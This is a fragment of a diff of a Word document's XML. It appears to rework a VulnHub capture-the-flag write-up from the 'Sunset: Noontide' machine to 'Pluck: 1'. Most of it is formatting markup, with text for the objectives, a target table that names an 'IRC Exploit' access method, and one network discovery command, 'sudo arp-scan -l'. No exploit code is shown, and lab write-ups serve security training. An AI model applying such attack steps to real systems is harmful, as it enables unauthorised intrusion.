+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -4754,7 +4723,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Sunset: Noontide is a vulnerable Linux virtual machine from the VulnHub platform designed to test penetration testing skills such as network enumeration, service exploitation, and privilege escalation.</w:t>
+        <w:t>Pluck: 1 is a vulnerable Linux machine designed to test web exploitation, enumeration, and privilege escalation skills.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4774,7 +4743,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The objective of this challenge is to:</w:t>
+        <w:t>The goal is to:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4794,7 +4763,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>• Perform network discovery</w:t>
+        <w:br/>
+        <w:t>• Discover the target machine</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4804,7 +4774,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Identify open services</w:t>
+        <w:t>• Perform enumeration</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4814,7 +4784,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Exploit vulnerable services</w:t>
+        <w:t>• Exploit vulnerabilities</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4824,7 +4794,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Gain initial shell access</w:t>
+        <w:t>• Gain user access</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4844,484 +4814,38 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Capture user and root flags</w:t>
+        <w:t>• Capture the final flag</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Target Information</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:top w:w="15" w:type="dxa"/>
-          <w:left w:w="15" w:type="dxa"/>
-          <w:bottom w:w="15" w:type="dxa"/>
-          <w:right w:w="15" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="1582"/>
-        <w:gridCol w:w="1849"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:tblHeader/>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Parameter</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Value</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Platform</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>VulnHub</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Machine</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Sunset: Noontide</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Target IP</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>172.20.10.2</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>OS</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Linux</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>Access Method</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>IRC Exploit</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -5330,45 +4854,45 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Enumeration Phase</w:t>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Target Identification</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="1"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -5379,26 +4903,12 @@
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Step 1 — </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Network Discovery</w:t>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Network Scan</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5418,7 +4928,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Command used:</w:t>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5464,7 +4974,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>sudo arp-scan -l</w:t>
+        <w:t xml:space="preserve">sudo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>arp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-scan -l</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5484,7 +5022,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Target identified:</w:t>
+        <w:t>Target IP identified:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5535,140 +5073,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8EDE6E" wp14:editId="38EBD412">
-            <wp:extent cx="5731510" cy="2448560"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
-            <wp:docPr id="1423592019" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1423592019" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
